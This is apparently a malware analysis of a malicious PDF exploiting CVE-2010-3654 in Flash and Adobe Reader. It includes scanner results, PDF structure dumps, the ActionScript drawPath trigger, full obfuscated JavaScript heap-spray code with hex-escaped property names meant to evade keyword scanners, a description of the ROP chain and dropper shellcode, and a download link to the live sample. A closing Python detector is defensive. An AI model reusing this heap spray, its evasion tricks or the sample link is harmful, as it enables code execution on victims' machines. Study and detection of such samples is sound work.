Description (CVE-2010-3654):
Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris and 10.1.95.1 on Android, and authplay.dll (aka AuthPlayLib.bundle or libauthplay.so.0.0.0) in Adobe Reader and Acrobat 9.x through 9.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via crafted SWF content, as exploited in the wild in October 2010.
---
PDF file (uncompressed):

%PDF-1.7
%âãÏÓ
obj 26 0  Type: -  Referencing: -
  <</Linearized 1/L 241680/O 29/E 6094/N 1/T 241354/H [ 513 208]>>
obj 37 0  Type: /XRef  Referencing: 25 0 R, 27 0 R  Contains stream
  <</DecodeParms<</Columns 4/Predictor 12>>/Filter/FlateDecode/ID[<BFEF0C62A7E9A94FAAEC52A3E6C8279A><CF478FAC136BCC4BA27379A9D0BF1937>]/Index[26 47]/Info 25 0 R/Length 66/Prev 241355/Root 27 0 R/Size 73/Type/XRef/W[1 2 1]>>
PDF file (compressed):

%PDF-1.7
%âãÏÓ
26 0 obj
<</Linearized 1/L 241680/O 29/E 6094/N 1/T 241354/H [ 513 208]>>
endobj
37 0 obj
<</DecodeParms<</Columns 4/Predictor 12>>/Filter/FlateDecode/ID[<BFEF0C62A7E9A94FAAEC52A3E6C8279A><CF478FAC136BCC4BA27379A9D0BF1937>]/Index[26 47]/Info 25 0 R/Length 66/Prev 241355/Root 27 0 R/Size 73/Type/XRef/W[1 2 1]>>
stream
[compressed binary data]
----
VirusTotal analysis

Antivirus | Version | Last Update | Result
AhnLab-V3 | 2010.11.02.00 | 2010.11.01 | PDF/Cve-2010-3654
AntiVir | 7.10.13.77 | 2010.11.01 | -
Antiy-AVL | 2.0.3.7 | 2010.11.01 | Exploit/Win32.CVE-2010-3654
Authentium | 5.2.0.5 | 2010.11.01 | -
Avast | 4.8.1351.0 | 2010.11.01 | JS:Pdfka-gen
Avast5 | 5.0.594.0 | 2010.11.01 | JS:Pdfka-gen
AVG | 9.0.0.851 | 2010.11.02 | Exploit_c.NLK
BitDefender | 7.2 | 2010.11.02 | Exploit.PDF-JS.Gen
CAT-QuickHeal | 11.00 | 2010.10.26 | -
ClamAV | 0.96.2.0-git | 2010.11.02 | BC.PDF.Parser-4.MalwareFound
Comodo | 6583 | 2010.11.01 | -
DrWeb | 5.0.2.03300 | 2010.11.02 | -
Emsisoft | 5.0.0.50 | 2010.11.02 | Exploit.Win32.CVE-2010-3654!IK
eSafe | 7.0.17.0 | 2010.11.01 | -
eTrust-Vet | 36.1.7948 | 2010.11.01 | PDF/CVE-2010-3654!exploit
F-Prot | 4.6.2.117 | 2010.11.01 | W32/Heuristic-XEN!Eldorado
F-Secure | 9.0.16160.0 | 2010.11.02 | Exploit:W32/Pidief.CSR
Fortinet | 4.2.249.0 | 2010.11.01 | JS/Agent.FSH!exploit
GData | 21 | 2010.11.02 | Exploit.PDF-JS.Gen
Ikarus | T3.1.1.90.0 | 2010.11.02 | Exploit.Win32.CVE-2010-3654
Jiangmin | 13.0.900 | 2010.11.01 | -
K7AntiVirus | 9.67.2882 | 2010.11.01 | -
Kaspersky | 7.0.0.125 | 2010.11.01 | Exploit.Win32.CVE-2010-3654.a
McAfee | 5.400.0.1158 | 2010.11.02 | -
McAfee-GW-Edition | 2010.1C | 2010.11.01 | Heuristic.BehavesLike.PDF.Suspicious.O
Microsoft | 1.6301 | 2010.11.01 | Exploit:Win32/Pdfjsc.gen!A
NOD32 | 5583 | 2010.11.01 | JS/Exploit.Pdfka.OKB
Norman | 6.06.10 | 2010.11.01 | JS/CVE-2010-3654.A
nProtect | 2010-11-01.01 | 2010.11.01 | Exploit.PDF-JS.Gen
Panda | 10.0.2.7 | 2010.11.01 | Exploit/PDF.Flash.A
PCTools | 7.0.3.5 | 2010.11.02 | Trojan.Pidief
Prevx | 3.0 | 2010.11.02 | -
Rising | 22.71.06.04 | 2010.11.01 | -
Sophos | 4.59.0 | 2010.11.02 | Troj/SWFLdr-V
Sunbelt | 7190 | 2010.11.02 | Exploit.PDF-JS.Gen (v)
SUPERAntiSpyware | 4.40.0.1006 | 2010.11.02 | -
Symantec | 20101.2.0.161 | 2010.11.02 | Trojan.Pidief
TheHacker | 6.7.0.1.075 | 2010.11.02 | -
TrendMicro | 9.120.0.1004 | 2010.11.01 | TROJ_PIDIEF.WV
TrendMicro-HouseCall | 9.120.0.1004 | 2010.11.02 | TROJ_PIDIEF.WV
VBA32 | 3.12.14.1 | 2010.11.01 | -
ViRobot | 2010.10.4.4074 | 2010.11.01 | PDF.S.Exploit.241679
VirusBuster | 12.70.15.0 | 2010.11.01 | -

PEiD: -
Packers (F-Prot): XORCrypt
Packers (Kaspersky): Swf2Swc

PDFiD:
PDF Header: %PDF-1.7
obj 22
endobj 22
stream 19
endstream 19
xref 0
trailer 0
startxref 2
/Page 1
/Encrypt 0
/ObjStm 5
/JS 0
/JavaScript 0
/AA 0
/OpenAction 0
/AcroForm 0
/JBIG2Decode 0
/RichMedia 0
/Colors > 2^24 0
Document information

content/type: PDF document, version 1.7
Object 4.0 @ 12391: suspicious.flash (Embedded Flash Object)
Object 4.0 @ 12391: flash.exploit (CVE-2010-3654)
Object 28.0 @ 945: suspicious.obfuscation (using unescape)
Object 28.0 @ 945: suspicious.string (heap spray shellcode)
Object 35.0 @ 4944: suspicious.flash (Adobe Shockwave Flash in a PDF define obj type)
---
Now, the exploit itself.
First, the curvedPolygon routine:
```actionscript
// vecPoints, shLines, vecWind and rbgWind are members of the enclosing class (not shown here).
function drawLines():void {
    var i:int;
    var n:int = vecPoints.length;
    var vecCmds:Vector.<int> = new Vector.<int>();
    var vecCoords:Vector.<Number> = new Vector.<Number>();
    for (i = 0; i < n; i++) {
        vecCoords[2*i] = vecPoints[i].x;
        vecCoords[2*i+1] = vecPoints[i].y;
    }
    // close the path back to the first point
    vecCoords[2*n] = vecPoints[0].x;
    vecCoords[2*n+1] = vecPoints[0].y;
    for (i = 0; i <= (n/2); i++) {
        vecCmds[i] = 3; // This line creates "curveTo" commands
    }
    vecCmds[0] = 1;     // first command is "moveTo"
    shLines.graphics.clear();
    shLines.graphics.lineStyle(1, 0);
    shLines.graphics.beginFill(0xFF0000);
    shLines.graphics.drawPath(vecCmds, vecCoords, vecWind[rbgWind.selectedData]);
    shLines.graphics.endFill();
}
```
Source code of the heap spray:

```javascript
var p = unescape;
// Property names are spelled as hex escapes so that keyword scanners do not see them:
var len = "\x6c\x65\x6e\x67\x74\x68";           // "length"
var s2 = "\x73\x75\x62\x73\x74\x72\x69\x6e\x67"; // "substring"
var s3 = "\x73\x75\x62\x73\x74\x72";             // "substr"

// Turns a hex string such as "58585858" into "%u5858%u5858" for unescape().
function a(__) {
    var _ = '';
    for (var ___ = 0; ___ < __[len]; ___ += 4)
        _ += '%' + 'u' + __[s3](___, 4);
    return _;
}

function s() {
    c = p(a("58585858"));                  // filler made of the 0x58585858 spray address
    while (c[len] + 20 + 8 < 0x10000) c = c + c;
    b = c[s2](0, (0x5858 - 0x24) / 2);
    b += p(a("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")); // shellcode hex (elided)
    b += c;
    d = b[s2](0, 0x10000 / 2);
    e = c[s2](0, 0x8000 - (0x1020 - 0x08) / 2);
    while (d[len] < 0x80000) d += d;       // grow each spray block to 0x80000 bytes
    _3 = d[s2](0, 0x80000 - (0x1020 - 0x08) / 2);
    _4 = new Array();
    _5 = new Array();
    for (i = 0; i < 0x300; i = i + 1)
        for (j = 0; j < 16; j++) _5[i*16 + j] = e + "y";
    for (i = 0; i < 0x300; i = i + 1)
        for (j = 0; j < 15; j++) _5[i*16 + j] = null;   // release 15 of every 16 blocks to shape the heap
    for (i = 0; i < 0x280; i = i + 1) _4[i] = _3 + "s"; // fill the freed space with the large blocks
}
s();
```
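An added detection example (my own code, not from the post or the exploit): a small Python scanner that flags the indicators this analysis relies on, namely an embedded SWF header, hex-escaped JavaScript property names such as "length" and "substr", and the '%'+'u' builder paired with a doubling loop that characterise this heap spray. The PDF bytes it scans are constructed for the demo, not taken from the sample.

```python
import re

# Constructed sample (not the analysed file): a minimal PDF-like byte string with
# an embedded SWF header and a JavaScript stream reusing the obfuscation idioms
# seen above (hex-escaped property names, '%'+'u' building, doubling loop).
SAMPLE_PDF = (
    b"%PDF-1.7\n"
    b"4 0 obj\n<</Type/RichMedia/Length 10>>\nstream\nCWS\x0a\x10\x00\x00\x00\x00\nendstream\nendobj\n"
    b"28 0 obj\n<</S/JavaScript/JS 29 0 R>>\nendobj\n"
    b"29 0 obj\n<</Length 180>>\nstream\n"
    b'var p = unescape; var len = "\\x6c\\x65\\x6e\\x67\\x74\\x68"; var s3 = "\\x73\\x75\\x62\\x73\\x74\\x72";\n'
    b"function a(__){var _='';for(var ___=0;___<__[len];___+=4) _+='%'+'u'+__[s3](___,4);return _;}\n"
    b"while(d[len] < 0x80000) d+=d;\n"
    b"endstream\nendobj\n"
)
# Constructed benign document for comparison.
CLEAN_PDF = b"%PDF-1.7\n1 0 obj\n<</Type/Catalog/Pages 2 0 R>>\nendobj\n"

# Names that exploit JavaScript hides behind hex escapes to defeat keyword scanners.
SENSITIVE_NAMES = {b"length", b"substring", b"substr", b"unescape", b"eval"}

SWF_MAGIC = re.compile(rb"(?<![A-Za-z])(?:FWS|CWS|ZWS)[\x01-\x20]")   # SWF signature + version byte
HEX_STRING = re.compile(rb'"((?:\\x[0-9a-fA-F]{2}){2,})"')            # "\x6c\x65..." literals
UNICODE_BUILDER = re.compile(rb"'%'\s*\+\s*'u'|%u[0-9a-fA-F]{4}")       # building %uXXXX for unescape
SPRAY_LOOP = re.compile(rb"while\s*\([^)]*<\s*0x[0-9a-fA-F]{5,}\s*\)\s*\w+\s*\+=\s*\w+")  # s += s until huge


def decode_hex_string(raw: bytes) -> bytes:
    """Turn b'\\x6c\\x65...' into the bytes it spells out (here b'le...')."""
    return bytes(int(h, 16) for h in re.findall(rb"\\x([0-9a-fA-F]{2})", raw))


def scan_pdf(data: bytes) -> list:
    """Return the sorted list of indicator names found in raw PDF bytes."""
    found = set()
    if SWF_MAGIC.search(data):
        found.add("embedded_swf")
    if re.search(rb"/JavaScript|/JS\b", data):
        found.add("javascript")
    hidden = {decode_hex_string(m) for m in HEX_STRING.findall(data)}
    if hidden & SENSITIVE_NAMES:
        found.add("hex_escaped_property_names")
    if UNICODE_BUILDER.search(data) and SPRAY_LOOP.search(data):
        found.add("heap_spray")
    return sorted(found)


if __name__ == "__main__":
    print("sample:", scan_pdf(SAMPLE_PDF))
    print("clean: ", scan_pdf(CLEAN_PDF))
```

This only sees objects stored uncompressed: the PDFiD output above reports /JS 0 and /JavaScript 0 but /ObjStm 5, so on the real sample the object streams must be inflated before the JavaScript becomes visible to a scanner like this.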
The exploit uses ROP (return-oriented programming); the gadget chain on the stack is built from addresses inside BIB.dll and is followed by the shellcode.
The shellcode drops ~.exe and ~temp.bat into the %temp% directory, along with a decoy PDF that has the same name as the original PDF.
Sample download: http://www.mediafire.com/?va3mw7fe5vqygha
----------------
Wisp trojan?
https://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=Trojan:Win32/Wisp.A
http://www.threatexpert.com/report.aspx?md5=9f0cefe847174185030a1f027b3813ec
http://www.securityhome.eu/malware/malware.php?mal_id=897505004b9a591d6da897.20308017
Reference: news.softpedia.com